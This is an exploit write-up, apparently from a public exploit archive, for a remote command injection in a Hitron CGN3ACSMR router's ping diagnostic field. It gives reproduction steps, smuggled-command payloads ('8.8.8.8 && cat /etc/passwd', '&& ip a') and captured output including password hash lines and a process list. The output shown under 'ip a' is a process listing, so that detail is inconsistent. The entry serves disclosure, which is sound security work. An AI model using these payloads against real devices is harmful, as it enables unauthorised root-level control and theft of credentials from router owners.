45 lines
No EOL
1.2 KiB
Text
45 lines
No EOL
1.2 KiB
Text
# Exploit title: Hitron Router (CGN3ACSMR) - Remote Code Execution
|
|
# Author: Dolev Farhi (dolevf at protonmail.ch)
|
|
# Date: 29-10-2015
|
|
# Vendor homepage: http://www.hitrontech.com/en/index.php
|
|
# Software version: 4.5.8.16
|
|
# Hardware version: 1A
|
|
|
|
# Details:
|
|
Hitron routers provide an interface to test connectivity (ping, tracert) via the graphical user interface of the router (Management UI).
|
|
This interface is vulnerable to code injection using the && argument after the IP address.
|
|
|
|
# Steps to reproduce:
|
|
1. Navigate to the dashboard
|
|
2. Navigate to the admin tab
|
|
3. Type an ip address in the Destination form
|
|
4. append any code you want after the ip.
|
|
|
|
Example one:
|
|
8.8.8.8 && cat /etc/passwd
|
|
|
|
Result
|
|
|
|
root:$1$27272727:0:0::/:/bin/false
|
|
nobody:$1$27272727:65535:65535::/:/bin/false
|
|
rogcesadmin:filtered/:100:100::/:/usr/sbin/cli
|
|
=============Complete==============
|
|
|
|
|
|
|
|
Example two:
|
|
8.8.8.8 && ip a
|
|
PID USER VSZ STAT COMMAND
|
|
1 root 1268 S init
|
|
2 root 0 SW [kthreadd]
|
|
3 root 0 SW [ksoftirqd/0]
|
|
5 root 0 SW [kworker/u:0]
|
|
6 root 0 SW< [khelper]
|
|
7 root 0 SW [irq/74-hw_mutex]
|
|
8 root 0 SW [sync_supers]
|
|
9 root 0 SW [bdi-default]
|
|
10 root 0 SW< [kblockd]
|
|
11 root 0 SW< [gPunitWorkqueue]
|
|
12 root 0 SW [irq/79-punit_in]
|
|
13 root 0 SW [kswapd0]
|
|
14 root 0 SW< [crypto] |